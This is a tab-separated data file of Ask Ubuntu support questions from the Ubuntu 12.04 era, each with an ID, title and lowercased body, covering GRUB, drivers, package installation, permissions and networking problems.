158244	unable to install updates or anny programs after upgrade	after i upgraded my ubuntu to 12.04 i cant install or update any programs , it keep on giving an error saying failed to download repository information i have tried with apt-get in terminal and it also failed . i have tried solutions in other threads , but it did not resolve my problem .
158248	how can i install wireless drivers without internet ?	[ ubuntu 12.04 lts ] i have a hp pavilion dv6 and i need a broadcom driver ( closed source ) to access the internet . however , i need to download that , which i am unable to do because i do not have internet access . my ethernet port has always been broken and i have not been able to access the internet since i installed ubuntu . i need to find a way for me to install those drivers desperately . i still have ubuntu on my usb , which for some reason , did have the ability to install that driver ( i think it 's due to the fact that it already has it somewhere in the files ) . on my usb ubuntu , i have that particular driver installed . i was thinking that if one of you knows where drivers are installed , i could locate those files on the usb ubuntu , then plug in an additional usb to copy them ; restart my computer to the harddrive ubuntu and then install the files from the ( additional ) usb . i would really appreciate help since to me a computer without internet is useless .
158251	grub disappeared after recent ubuntu 12/win7 install ?	i recently installed win7 and ubuntu 12 on a new build . installed windows first , as recommended , and then ubuntu on the remaining unused drive space . everything was working fine , grub allowed me to dual boot properly . until this morning - switched the machine on , and it booted into windows - no grub . i 'm wondering if a recent windows update may have overwritten the mbr ? so.. what 's most likely to have caused this ? how do i get grub back ? how do i stop it happening again in the future ? thanks !
158253	create new server tomcat7 in eclipse	i installed tomcat7 by the command sudo apt-get install tomcat7 . so far so good i wanted to create a new server in eclipse with tomcat7 and went to preferences - > servers - > runtime environments and added tomcat7 with the path `` /usr/share/tomcat7 '' which was set by default . i created a project with dynamic web content where tomcat7 was already selected . i switched to the java ee perspective and to the server view . it was no server defined so i wanted to define one with the new server wizard which did n't allow me to create a new tomcat7 server with the message `` can not create a server using the selected type '' . so i searched the solution in google and found this blog i could n't find the .metadata folder in my workspace , therefore i created a new workspace since my other workspace seems to be corrupt . doing that and the steps 1 to 3 in the blog did n't solve my problem . i hope anyone of you could help me out . further information : ubuntu 12.04 eclipse indigo jee 3.7 tomcat 7 thanks in advance edit : i just tryed to remove the tomcat7 installation but it throws me following error : : ~ $ sudo apt-get remove tomcat7 reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libcommons-collections3-java libecj-java libcommons-pool-java authbind tomcat7-common libtomcat7-java libcommons-dbcp-java libservlet3.0-java use 'apt-get autoremove ' to remove them . the following packages will be removed : tomcat7 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 356 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 512973 files and directories currently installed . ) removing tomcat7 ... /var/lib/dpkg/info/tomcat7.prerm : 373 : . : 3 : too many open files dpkg : error processing tomcat7 ( -- remove ) : subprocess installed pre-removal script returned error exit status 2 no apport report written because maxreports is reached already /var/lib/dpkg/info/tomcat7.config : 373 : . : 4 : too many open files dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : tomcat7 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
158254	i ca n't connect to mobile brodband , but it is detecting	when i connect my nokia x2 with my ubuntu 12.04 , it detects the connection bsnl gprs , but i ca n't connect to the internet . when ever i try to connect , modem get disconnectd..what should i do ?
158256	is there a way to install softwares ( offline ) using some one else 's apt-archives ?	is it possible to install softwares from backups of some else 's /var/cache/apt/archives ? it will be a grt discovery fr me if it could be possible . i have tried installing gstreamer downloaded on ubuntu 12 on ubuntu 11 but it could not work . what i did is i copied the archive dir which have the .deb files to my friends computer and tried to replace his archive dir with that . when i hit the install button ( on ubuntu software center ) it started to downloading directly from net . can gdebi package installer do that ? is there any other alternative to do this ?
158258	partition resize	i have a dual boot system with c : drive with windows 227 gb e : drive in windows 185 gb ext4 ubuntu - 38 gb linux swap - 4 gb i want to decrease the space from e : drive from 185 gb to say about 160 gb and assign the 25 gb achieved from the resizing to the ext4 partition so that my ubuntu home has more space . i was told that do a resize in gparted could cause some boot problems , plase tell me a safe way to achieve this resizing .
158261	is there a pomodoro app available ?	is there a pomodoro app that 's available for ubuntu 12.04 that can be installed using sudo or from the package manager ?
158270	exiting the file explorer in vim	i know to enter the file explorer in vim ( by typing : e . ) . i am not sure how to exit the file explorer in vim . i typed : q and it gave me a segmentation fault . what should be the correct way to exit the file explorer in vim ?
158272	how do i get an kodak esp c315 scanner working ?	i installed ubuntu 12.04 32bit . it 's working great , but i ca n't get my scanner to work . i tried to 'just scan ' with simple-scan , but i got the following error : error : no scanner detected , please check your scanner is connected an powered on but the scanner is powered on . i used a scanner via usb .
158280	invalid system disc on boot	when i boot my laptop which has ubuntu 12.04 and windows 7 i get a message `` invalid system disc please replace the disc , then press any key '' if on this command i press random keys my grub menu appears and my booting to ubuntu 12.04 takes place without any glitch . also i initially installed 11.10 but upgraded to 12.04 when it was released . also , no such problem ever occured when i was on 11.10 .
158281	lubuntu/lxde - can not open folder on desktop	i 'm running lubuntu with lxde . when i double-click on a folder on the desktop , it does not open . the read/write settings are correct . any idea what i could do ?
158283	flash videos go haywire in fullscreen mode in google chrome 20	whenever i go fullscreen on a youtube video , there is a moment of static , then the controls continuously jump all over the screen , and it seems like the player is trying to center the video between both monitors ( i have a two monitor system ) . never had any problems watching full screen flash videos with my dual monitor setup ( same hardware ) in 11.10 or 10.04 . this problem only began after upgrading to 12.04 . here is a screenshot ( showing both monitors , fullscreen video on the left ) : ( not enough reputation to embed ... lame ) - http : //i.imgur.com/euwzu.png no other graphics problems on any other applications . videos display fullscreen in firefox as expected ( html 5 instead of flash ? ) here is some flash debug info , not sure if it 's useful : ts=1340905046 & stacktrace= & cl=31482712 & debug % 5fsourcedata=b3d5b0986hh1341141813925019 & videofps=26 & debug % 5fdate=sun % 20jul % 201 % 2018 % 3a23 % 3a59 % 20gmt % 2b0700 % 202012 & debug % 5fplaybackquality=hd720 & debug % 5fvideoid=9i8cvlzdot4 & droppedframes=345 & stagefps=10 & debug % 5fflashversion=lnx % 2011 % 2c3 % 2c31 % 2c109 i 've tried re-installing chrome with no success . any ideas ? thanks ! edit - i removed '12.04 ' from the title as this is a chrome / flash issue and not a problem with 12.04 . see comment below for the fix ( ca n't answer for 8 hours ) .
158285	how to dual boot with windows 7 on an ubuntu-only system ?	well basically , i have a 500gb hard drive with ubuntu 12.04 installed ( only os at the moment ) . i plan to install windows 7 home premium 64-bit on a 50gb partition and dual boot it with ubuntu . does anyone know how ? thanks !
158288	the best autocad 2010 ubuntu alternative ?	i 'm looking for the best autocad 2010 alternative for ubuntu . wine 's support for the 2010 version is n't polished so i 'm looking for linux based similar programs . i know that this can be subjective so i 'd like to know what 's the best ubuntu alternative which has the most similar , and significant features as that of autocad 2010 ? i 'm not familiar with the program because i 'm researching this for my sister who is studying aeronautical engineering . any help is appreciated . i 'm using 12.04 64-bit on my thinkpad r61i with 3.8gb memory and 160gb hard drive .
158290	configuration for multiseat in ubuntu 12.04 64 bit	what would be the xorg and lightdm configuration for ubuntu 12.04 64bit on a amd dual head graphics ? i want to start independent lightdm instances on both monitors .
158295	gnome shell online accounts fails connection	i 'm using ubuntu 12.04 ( gnome shell ) and i just setup the `` online accounts '' with my gmail . problem is , everytime i reboot my computer , it popups `` connection to blablabla @ gmail.com has failed '' . a friend of mine talked to me in google chat and i got notified , so i guess the only part `` broken '' is the email . anything i can do to fix it ? would be very nice to receive mail notification there . thanks : )
158297	why has gnome 3 reverted to classic ( gnome 2 ) look and feel ?	not sure where to start with this one . i 've installed gnome 3 by running sudo apt-get install gnome on my netbook , it all installed fine and ran fine did n't have any issues with it for a few weeks , then i turned on my netbook and logged in to be given the look and feel of gnome 2 . i 've cropped down the desktop in the image below . edit : pastebinit as requested by izx kern.log dmesg sudo lshw
158298	install ubuntu within windows 7	couple of years back i was using ubuntu installed within windows 7 os . back then ubuntu version was 10.04 . today , i downloaded ubuntu 64-bit live disc and when i try to install i do not understand how to install within windows 7 . so , any day later if i need to uninstall ubuntu i can do by uninstalling via wubi . somehow i do not find those options now . what am i missing ? it 's a dell inspiron laptop running windows 7 home edition . well , more information on the issue : i have downloaded the disk image file : ubuntu-12.04-desktop-amd64.iso and burnt it to a physical disc . upon starting wubi.exe these are the first two views i see : and then : i do not understand what is going wrong ! : - ) : - )
158299	why does installing grub2 give an `` iso9660 : filesystem destruction ... '' warning ?	i have installed ubuntu 12.04 on my computer , but at the end of the installation it gave me an error and it did n't install grub2 . now i 'm trying to install it using the live cd : this is my sudo fdisk -l : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x6af447e6 device boot start end blocks id system /dev/sda1 * 2048 781459455 390728704 7 hpfs/ntfs/exfat /dev/sda2 781459456 789272575 3906560 82 linux swap / solaris /dev/sda3 789272576 976773119 93750272 83 linux after mounting and chroot the linux partiton , i give grub-install /dev/sda command , and i get : /usr/sbin/grub-setup : error : hd0 appears to contain a iso9660 filesystem which is n't known to reserve space for dos-style boot . installing grub there could result in filesystem destruction if valuable data is overwritten by grub-setup ( -- skip-fs-probe disables this check , use at your own risk ) . ( same error even with grub-install -- recheck /dev/sda ) what can i do ? i also tried boot-repair , but i get this error : http : //paste.ubuntu.com/1069353/
158305	python-libnotify showing weird behaviour with xfce4-notifyd and notify-osd	i am trying to play with libnotify 's python bindings . i got this code from /usr/share/doc/python-notify/examples and it is showing different behaviour with xfce4-notifyd and notify-osd . case-1 with xfce4-notifyd case-2 with notify-osd you can see the difference in both the cases . in 1st case the action is integrated in the form of button in xfce4-notifyd whereas in 2nd case this is not happening . in 2nd case it just shows up as a new window . so , can anyone tell me why i am observing this weird behaviour and how do i add action buttons to notify-osd notifications . ps : i am using the patched version of notify-osd . my default notifications with notify-osd looks like
158309	why do n't ctrl+alt+4/6 position windows to the left or right ?	i was thrilled to discover the keyboard based tiling functionality provided by unity . however , why does n't it support tiling to the left or right . the other numbers on the numpad do something , why not 4 and 6 ? am i overlooking something ? -austin update : i am using ubuntu 12.04 .
158310	why is the superblock last mount time in the future ?	future time : since installing ubuntu 12.04 , i regularly have to fun fsck and reset my clock because it shows a 'future time ' : err.msg . `` superblock last mount time is in the future by less than a day , probably due to hardware clock being incorrectly set . '' fixed . according to what i have read , it looks like i 'm in the right place to get an answer . following are my feeble attempts to rectify this annoyance : mjh @ mjh-desktop : ~ $ sudo service ntp start [ sudo ] password for mjh : ntp : unrecognized service mjh @ mjh-desktop : ~ $ mjh @ mjh-desktop : ~ $ sudo apt-get install update reading package lists ... done building dependency tree reading state information ... done e : unable to locate package update mjh @ mjh-desktop : ~ $ sudo service ntp start ntp : unrecognized service mjh @ mjh-desktop : ~ $ suggestions ? matthew
158312	xubuntu : how do i automatically mount external ntfs drive with writes allowed ?	i would have thought mine was such a common question that there would be a simple solution already built in to xubuntu - but there isnt . i have 2 separate external hard disks and connect them to a usb port at different times - i would like them to be automatically mounted as read/write , but apparently the designers of gnome-volume-manager decided that shouldnt be possible and they are mounted as read-only in fact , i can write new files to them , but can not then delete the new files i just wrote ! is there a workaround ? i read somewhere that etc/fstab does n't apply to removable media , which are mounted by gnome-volume-manager and therefore can not be unmounted by a user
158315	why do i keep booting asus expressgate instead of the ubuntu cd ?	i am getting stuck in express gate cloud installed on the netbook asus and can not install my ubuntu os , can anyoane help me ?
158321	how can i get grub to appear after installing ubuntu with windows 7 using a liveusb ?	i booted ubuntu 12.04 lts from a liveusb , and then selected the option to install ubuntu to my hard drive . i allowed the installer to partition it , giving ubuntu 50gb and leaving windows 7 with 200gb . however , when i boot , it still boot straight into windows . the only way to access grub is by booting from the liveusb , although this can then be removed . how do i access the grub menu without using the usb ?
158323	how do i create a working indicator with qt/c++ ?	i am using qt ide in order to build my application so as to participate to the ubuntu showdown contest . in my application , i 've done the following : void show_app ( mainwindow *data ) { //this works fine : app_indicator_set_status ( appindicator , app_indicator_status_passive ) ; //this crashes the application : data- > show ( ) ; } void mainwindow : :make_indicator ( ) { if ( appindicator ) { //appindicator has already been created return ; } appindicator = app_indicator_new ( `` format junkie indicator '' , `` formatjunkie '' , app_indicator_category_application_status ) ; gtkwidget* showapp_option ; gtkwidget* indicatormenu = gtk_menu_new ( ) ; gtkwidget* item = gtk_menu_item_new_with_label ( `` format junkie main menu '' ) ; gtk_menu_item_set_submenu ( gtk_menu_item ( item ) , indicatormenu ) ; showapp_option = gtk_menu_item_new_with_label ( `` show app ! `` ) ; g_signal_connect ( showapp_option , `` activate '' , g_callback ( show_app ) , this ) ; gtk_menu_shell_append ( gtk_menu_shell ( indicatormenu ) , showapp_option ) ; gtk_widget_show_all ( indicatormenu ) ; app_indicator_set_status ( appindicator , app_indicator_status_active ) ; app_indicator_set_attention_icon ( appindicator , `` dialog-warning '' ) ; app_indicator_set_menu ( appindicator , gtk_menu ( indicatormenu ) ) ; } so , basically i am trying to make a simple indicator entry , which , on click , it will hide the indicator and display the application . the indicator can be successfully hidden using the passive thingy over there , but , during the call data- > show ( ) ; , the application crashes . any help on what i am doing wrong would be appreciated ! also , please help me to correct this problem i 'm facing ( alternatively , i will migrate to the old and good tray icon ( it works fine in 12.04 , anyway ) which i can handle very easily and efficiently )
158329	ca n't log-in anymore	i installed ubuntu x64 12.04 desktop lts on my new laptop three days ago . of course when i installed it i did an `` apt-get upgrade '' and a `` apt-get update '' . i modified the .bashrc file to add some aliases but that 's about it . everything went fine i think , but this morning when i tried to connect to my user account , it just simply did n't work . even when i give the right password , it will send me to a black screen with a few text lines written in white for a second and then back to the log-in screen . when i logged into the guest session , i could n't shutdown / restart . i tried the `` rm /home/myusername/.xauthority '' solution after doing a ctrl + alt + f1 at the log-in screen . but that did n't work . does anyone has an idea ? my ubuntu seems to use gnome . thank you a lot in advance ! this question is similar to this one , but their solution did n't help : -- > after 12.04 upgrade : ca n't log in although password is correct
158332	ubuntu installation with single drive	i have only one drive in my laptop with windows 7 . is it better to create another drive for installing wubi ? will i have any disadvantages if i go ahead with installing in single drive ? which is the better way to install without any disadvantages ?
158333	how to create a shortcut for forward delete ?	i 'd like to create a shortcut with ctrl+backspace or fn+backspace or ctrl+shift+backspace which performs a forward delete ( the same as the `` delete '' key ) . i use it ( fn+backspace ) on a mac and i find it very useful . is this feasible ?
158338	installer crash when i tried to install 12.04 on my macbook pro 7.1	i tried to install ubuntu 12.04 several times on my macbookpro 7.1 but each times it crashed . i burned a livecd - desktop 64bits , and launched it . it works well i can use the livecd as normal but when i want to install it crash after click on `` next '' on this screen : http : //i1-news.softpedia-static.com/images/extra/linux/large/ubuntu1204installation-large_002.jpg i tried weeks ago i get the same issue , now i downloaded & burn the actual iso and got the same problem . any clue to solve this ?
158340	why does the live-cd see `sda ' but the grub-installer does n't ?	when i boot into the live cd , i can see sda . i can partition it with fdisk . but when i start the installer and it gets to the partitioning window , the `` device for boot loader installation '' drop down box has only the usb disk ( sdb ) in it -- not sda . so i can not choose a place to install ubuntu . what could cause that ? i am building two similar machines . the other one did not have this problem . the only difference is that they have different hard disks . update : originally , the drive had a centos install . i ran fdisk only after the installer did not recognize it . i just ran garted and this time i had it recreate the partition table and now the installer sees the drive .
158344	no terminal library found when compiling vim	i am running ubuntu 12.04 . i 'm trying to a get a particular plugin for vim working and it requires that vim has ruby support enabled ( the plugin is command-t ) . people tell me that i must go into my vim directory and run ./configure -- enable-rubyinterp when i do this i get the following error : no terminal library found checking for tgetent ( ) ... configure : error : not found ! you need to install a terminal library ; for example ncurses . or specify the name of the library with -- with-tlib . now iâve checked and ncurses-base is installed . what do i need to do ?
158345	converting kwd files into odts fails	i 'm trying to convert kwd files into odt using kubuntu 11.10 but i 'm getting this error : $ koconverter llaves.kwd llaves.odt koconverter ( 3712 ) /koffice ( filter manager ) kofiltermanager : :filteravailable : the library `` '' does not offer a check_ `` '' function . object : :connect : no such signal kofiltermanager : :sigprogress ( int ) kfilterdev : :open : device is already open koconverter ( 3712 ) /export-filter-lib processattributes : unexpected attribute `` xmlns '' in `` document-info '' ! kfilterdev : :open : device is already open koconverter ( 3712 ) : `` *** the conversion failed ! ***
158346	why does nothing work after i randomly changed some file permissions ?	ok so last night i was trying to set permissions to some folders in my file system , since apparently im not an admin on my own computer . and now everything got messed up today and i do n't know what to do.. i lost my internet , the icon is not showing in the taskbar anymore . i lost my sound , there is no sound devices listed when i go into the sound menu . i can not log into root anymore , it gives me `` sudo : must be setuid root '' i can not plug anything in anymore , it will not recognize flash drives or external hard drives . it gives me a internal error message everytime i log in it does n't let me log into the grub screen anymore on boot up . what did i do ? i have a lot of files on here i wish to put on a flash drive but it wo n't recognize it .
158347	how do i make the launcher progress bar work with my application ?	background research i am attempting to update the progress bar within the unity launcher for a simple python/gtk application created using quickly called test ; however , following the instructions in this video , i have not been able to successfully update the progress bar in the unity launcher . in the unity integration video , quickly was not used , so the way that the application was structured was slightly different , and the code used in the video does not seem to function properly without modification in a default quickly ubuntu-application template application . screenshots here is a screenshot of the application icon as it is currently displayed in the unity launcher . here is a screenshot of the kind of unity launcher progress bar functionality that i would like ( overlayed on mail icon : wiki.ubuntu.com ) . project code a .zip file containing the project files can be found here . expected behavior i would expect the above code to show a progress bar that is 75 % full overlayed on the icon for the test application in the unity launcher , but the application only runs and displays no progress bar when the command quickly run is executed . problem investigation i believe that the problem is that i am not properly getting a reference to the application 's main window , however , i am not sure how to properly fix this problem . i also believe that the line : self.launcher = unity.launcherentry.get_for_desktop_id ( `` test.destkop '' ) may be another source of complication because quickly creates .desktop.in files rather than ordinary .desktop files , so i am not sure if that might be causing issues as well . perhaps , another source of the issue is that i do not entirely understand the difference between .desktop and .desktop.in files . does it possibly make sense to make a copy of the test.desktop.in file and rename it test.desktop , and place it in /usr/share/applications in order for get_for_desktop_id ( `` test , desktop '' ) to reference the correct .desktop file ? related research links although , i am still not clear on the difference between .desktop and .desktop.in files , i have done some research on .desktop files and i have come across a couple of links : desktop entry files ( library.gnome.org ) desktop file installation directory ( askubuntu.com ) unity launcher api ( wiki.ubuntu.com ) desktop files : putting your application in the desktop menus ( developer.gnome.org ) desktop menu specification ( standards.freedesktop.org ) edit after running python setup.py build and then navigating to /build/share/applications and moving the built test.desktop file to ~/.local/share/applications , and finally executing quickly run , only a question mark for an icon is being displayed , with no visible progress bar . edit 2 after further investigation of the built .desktop file , it turns out that the line : icon=/usr/share/test/media/test.svg within the .desktop file was pointing to an icon file called test.svg which did not exist . in order to resolve this problem , i created a new folder called test in /usr/share/ using the command sudo mkdir test and then created another folder inside of the test folder called media using the command sudo mkdir media , and then i moved the test.svg icon file located in my quickly project directory at test/data/media/test.svg to /usr/share/test/media/ . the .svg icon for the application now displays properly in the unity launcher bar and in the alt-tab view , however there is still no visible progress bar as shown in the screenshot below . edit 3 as @ dobey , pointed out , there was a typo in the code of the testwindow.py file at the line : self.launcher = unity.launcherentry.get_for_desktop_id ( `` test.destkop '' ) , where test.destkop , should be test.desktop . i changed this typo and no visible changes occurred when the application was executed using quickly run . however , after adding the line print ( 'integrating with launcher ' ) to add_launcher_integration ( ) there was no corresponding output in the terminal when the application was run , indicating that the problem seems to be that add_launcher_integration ( ) does not seem to be called correctly when the application starts . edit 4 after further investigation , it turns out that add_launcher_integration ( ) is in fact called when the application starts . with the addition of the line : os.system ( `` clear '' ) prior to the line print ( `` integrating with launcher '' ) the message `` integrating with launcher '' now displays in the terminal . however , there is still no progress bar visisble in the unity launcher bar . edit 5 after rebuilding the quickly project by executing python setup.py build and moving the built .desktop file within the quickly project located at /build/share/applications/ to ~/.local/share/applications , the application icon and the progress bar now displays properly in the unity launcher bar . a screenshot of the launcher integration can be seen below .
158348	where do i find drivers for the realtek 8111e lan controller ?	i just bought an asus p8h61-m lx motherboard . this motherboard comes with a windows driver package to enable the onboard ethernet port . my troubles with this board are documented here and here . after installing windows the lan did not work either , but after installing the supplied driver disk in windows the lan was then enabled . i have been googling for the linux driver but can not find it . i see that others have used this motherboard in linux , so apparently it is possible . i wrote to asus but i do not expect a reply for 48-72 hours .
158356	where do i install a .desktop launcher for my showdown app ?	that 's all in the title ... to be valid and to be read by launchers ( like unity dashboard ) a .desktop file must be in /usr/share/applications or in /usr/local/share/applications but a foundamental rule of the showdown contest says that every thing must be installed in opt/ . so where do i install it for my showdown app ?
158358	some programs not resolving hostnames	ubuntu 11.10 , kernel 3.0.0-20.34 both chromium and firefox are stuck `` waiting for www.whatever.com '' to load until they time-out . both of these browsers can load these websites if i navigate to the ip address rather than the host-name . lynx ( text mode ) does not have this problem . ubuntu software centre can search for software without issue , but fails to install . using apt-get via the command line i am told that none of the packages `` could be verified '' but as long as i choose to continue , then i can install with no further issue . ( guessing that 's where software centre falls down ) i have now used apt-get to install a web browser i discovered on the software centre called 'arora ' which worked without any issues for the first few sites , and now stops loading at 10 % every time . update manager will not update because `` requires installation of untrusted packages '' . i am guessing its the `` could not be verified '' issue from command line apt-get . apt-get update sticks at : 5 % [ waiting for headers ] ... so i am stuck with kernel version 3.0.0-20.34 . i was hoping a kernel update might fix it . ping works with host-names , without issue . i believe these are all symptoms of the same problem . if they are not then i am sorry for asking multiple questions in one thread . any suggestions welcome , thanks for reading . i forced grub to load and booted into the one previous kernel version i have ( 3.0.0-19 ) . this did not resolve the issue .
158366	navigate thru pictures in a compressed file without extracting	is there a way to view pictures that are inside a compressed file ( suppose .rar ) withour having to extract all them ? example : when i open a certain rar file that contains pictures , if i double click any picture , `` image viewer '' opens the picture normally , but i am not able to navigate ( with the arrows ) to the next picture . i have to close that one , and open the next one again . is there any software able to do this ?
158367	buying a new laptop with a trinity amd card in it ?	as i said in the title the laptop has the amd trinity a10-4600m processor and that card has integrated graphics . but the laptop also has an amd radeon hd 7670m card in it . will ubuntu 12.04 be able to use both at the same time or will one have to be disabled ? i have n't been able to find any good info about this .
158368	launcher in unity opens application in another icon	i have an application locked to my launcher . whenever i click on it or use the normal exec= ... .. in the .desktop , it works perfectly . i have recently added a quicklist option in the launcher . whenever i select this option , it opens the application , but not within the launcher icon . it will open its own instance further down on the launcher . it 's not the biggest deal in the world , but i would just prefer to have it open natively in the launcher . any thoughts ? if a video would help , i can record one .
158370	how to update a file , keeping the same link of the old version ?	i am writing a book and publishing parts of it in pdf format . i would keep the same link for all atualizations . how to do it ?
158380	writing to a file	def loadsubredditconfig ( self ) : self.builder.get_object ( 'cbxr ' ) .remove_all ( ) path = os.path.join ( xdg.basedirectory.xdg_config_home , 'redthat ' , 'subreddits ' ) if ( os.path.exists ( path ) ) : file = open ( path , 'r+ ' ) for line in file.readlines ( ) : self.builder.get_object ( 'cbxr ' ) .append_text ( line.strip ( ) .replace ( ' ' , '' ) ) else : file = open ( path , 'w ' ) # problem here file.write ( '' ) self.builder.get_object ( 'cbxr ' ) .append_text ( '' ) traceback ( most recent call last ) : file `` bin/gtkreddit '' , line 33 , in < module > gtkreddit.main ( ) file `` /home/robin/ubuntu one/python/gtkreddit/gtkreddit/__init__.py '' , line 33 , in main window = gtkredditwindow.gtkredditwindow ( ) file `` /home/robin/ubuntu one/python/gtkreddit/gtkreddit_lib/window.py '' , line 35 , in __new__ new_object.finish_initializing ( builder ) file `` /home/robin/ubuntu one/python/gtkreddit/gtkreddit/gtkredditwindow.py '' , line 63 , in finish_initializing self.loadsubredditconfig ( ) file `` /home/robin/ubuntu one/python/gtkreddit/gtkreddit/gtkredditwindow.py '' , line 236 , in loadsubredditconfig file = open ( path , 'w ' ) ioerror : [ errno 2 ] no such file or directory : '/home/robin/.config/redthat/subreddits' i want the file to be created . tried w , a , rw , w+ , a+ . all throw the same error .
158382	how to enter the terminal from the boot manager ?	i have been using the twinview dual monitor setup and recently had to take my laptop with me on a trip , and i foolishly disconnected it without changing anything in nvidia-settings . now , i ca n't log into ubuntu ( wubi ) . i just get the purple screen with the ubuntu logo and ... . on it . the only command that does something is ctrl+alt+del ( reboot ) . is there any way i can just enter into some sort of terminal right from the boot manager so that i can delete the new xorg.conf and restore the old one ? thanks .
158383	how can i make the fonts in thunderbird to look bigger ?	when i 'm using thunderbird with a 1080p resolution , it looks so small until zoomed . is there any way to make messages to look bigger permanently ? , because since last thunderbird update typographies can not be forced to have a minimum size for all the messages .
158388	how do i make chromium use flash from google chrome ?	now , that adobe has stopped issuing new releases for linux desktops , the only option for users is to use google chrome , for those who want to use the latest flash updates . i use chromium . is there any way to get chromium use the flash from google chrome ? the reason i as this question is that i have noticed both these browsers run in the background , so technically , the browsers ' plugins are available to use .
158392	how do you install software and updates without a password in 12.04 ?	im looking for a way to remove the need of a password to install/uninstall and update software in ubuntu 12.04 ? im trying to give some windows users a smooth transition . they have vista which doesnt require a password to install or update software . also without a password on the user account . how can i set it up to not automatically login but also not require a password to login to the user ? thanks for any help ! !
158393	grub2 detecting two windows 7 ( loader ) entries	this is the first question i have ever asked the ubuntu community . i 'm fairly new to ubuntu , but i understand the basics and know how to navigate the terminal . i also know how to search the existing solutions before asking for help . i have scoured the internet high and low and learned much of how grub2 works . but nothing has helped me to solve my problem . my problem is this : i have a computer that has three hard drives . it previously had windows xp , but i upgraded to windows 7 . i also installed ubuntu 12.04 lts ( precise pangolin ) . during my installation of windows 7 , there was a failure and i had to restart the installation . afterwards , i installed ubuntu . after some trouble removing all traces of the xp os ( ubuntu auto-detected it , but not windows 7 ) i got the two oses working flawlessly . or , almost . when booting up , grub2 used to display ubuntu , ubuntu recovery mode , other versions of linux , memtest , followed by windows 7 ( loader ) on /dev/sda1 and windows 7 ( loader ) on /dev/sdb1 . i eventually removed recovery mode , other versions , and memtest . now , when i run : sudo update-grub i get this print-out : generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-26-generic found initrd image : /boot/initrd.img-3.2.0-26-generic found windows 7 ( loader ) on /dev/sda1 found windows 7 ( loader ) on /dev/sdb1 i would like to remove `` windows 7 ( loader ) on /dev/sda1 '' , as it is a broken entry that should n't exist , and must have been installed during my first windows 7 attempt . i can not find a windows 7 entry in /etc/grub.d folder and i do n't know where to look . here is a layout of my hard drives : /dev/sda1/ ( 1.82 tib ) , ntfs ( `` media '' ) /dev/sdb1/ ( 100 mib ) , ntfs ( `` system reserved '' ) /dev/sdb2/ ( 149 gib ) , ntfs ( `` windows 7 '' ) /dev/sdb3/ ( 149 gib ) , extended ( `` `` ) /dev/sdb4/ ( 145 gib ) , ext4 ( `` `` ) /dev/sdb5/ ( 4 gib ) , linux-swap ( `` `` ) /dev/sdc1/ ( 488.28 gib ) , ntfs ( `` downloads '' ) /dev/sdc2/ ( 488.28 gib ) , ntfs ( `` altmedia '' ) /dev/sdc3/ ( 886.45 gib ) , ntfs ( `` personal '' ) unallocated ( 2.09 mib ) , unallocated what i think has happened : windows 7 installed first and badly . i installed it again . first , there was windows xp to guide where the bootloader went to so it was put on /dev/sdb1/ . but , the second time no such guide existed so the machine put another bootloader on /dev/sda1/ . sda1 , by the way , is the only partition on a 2tb drive . no boot record partition appears to exist according to gedit . i 'm not sure where grub2 is getting this information from . but , there it is . is there anything somebody can do to help me ? or , is there any more information i should add ?
158394	can not install themes due to permissions error	i have looked up several tutorials online , they all have one thing that i do n't have on my screen a menu that brings them through `` system > preferences > appearance . '' i also ca n't find my .themes folder , unless i am in gnome 3 but i am not allowed to add anything to it . it tells me i am not the owner even though i am set up as admin . can anyone recommend anything ?
158398	ssh login information	as the admin of my machine , i want users to be able to log into my computer with ssh , but i 'm looking for a graphical way to be notified that a user is connected at the moment . if multiple users are connected , i want a list of connected users , their location , name , etc . this could be in the form of a forcecommand and 'alert ' command when someone logs in , plus a icon saying how many people are connected right now in the notification bar , with the option to click on it to have more information about these users . is there such a tool available in ubuntu , and if not , how to do it ( i 'm guessing it 's not that difficult and could be done with under ten bash command lines ) ?
158401	how do i install the old `` add/remove applications '' ?	i have a netbook running ubuntu . the ubuntu software center is too slow and i like add/remove applications more than i do the ubuntu software center . when i try fedora i like the add/remove applications but how do i get on ubuntu 12.04 ?
158406	how to blend in gnome-panel ?	i 'm on ubuntu 12.04 , and i 'm not a big fan of unity , although i 'm not a big fan of downgrading either.. so i 've installed gnome-panel to try to get a better feel for gnome 2 . i quickly noticed that it is horrendous . 1 ) applications/places are gray , not white . 2 ) the bottom part of the panel where the open windows / taskbar is are white . i love the ambiance theme so i would prefer not to get an answer involving switching themes . i saw another question that involved editing a css file in ~/.config/gtk-3.0/gtk.css but it did n't have any change . any ideas ?
158408	how do i create a 12.04 liveusb for a non-pae machine ?	i 'm trying to create a dual-boot laptop with ubuntu 12.04 and some flavor of windows ( tbd ) . to do that , i need to do some work on partitions & install 12.04 . to do that , i need to create a bootable usb that will work with my non-pae-capable cpu . someone pointed me to a mini.iso that was allegedly non-pae-friendly , but it gave me the same error as the straightup 12.04 desktop iso . what version do i actually need ? ( this is n't going to be a virtual machine -- i do n't think the laptop has the ram to handle that happily -- so enabling pae in the virtual machineware does n't help me . )
158411	authentication required to mount a device	today i came across a very strange message when today i double click the drive which has ntfs format it give me this message that authentication is required to mount a device i know with root user password u can do this but i have not set the root user password and i do n't know the default one . so can any one tell me how to solve this issue . graphically and through command line . and same thing happen when i tried to install a theme , terminal slapped me with this message `` umairmustafa is not in the sudoers file . this incident will be reported . '' what on earth is going on .
158413	changing to static ip ?	i 'm using ubuntu server and trying to set my connection to have a static ip , instead of a dynamic one . however , whenever i enter this into /etc/network/interface auto wlan0 iface wlan0 inet static address 192.168.1.68 netmask 255.255.255.0 gateway 192.168.1.64 my server ca n't connect to the internet . running something like sudo apt-get upgrade , gives errors because i 'm not connected to the internet . what 's wrong with this ?
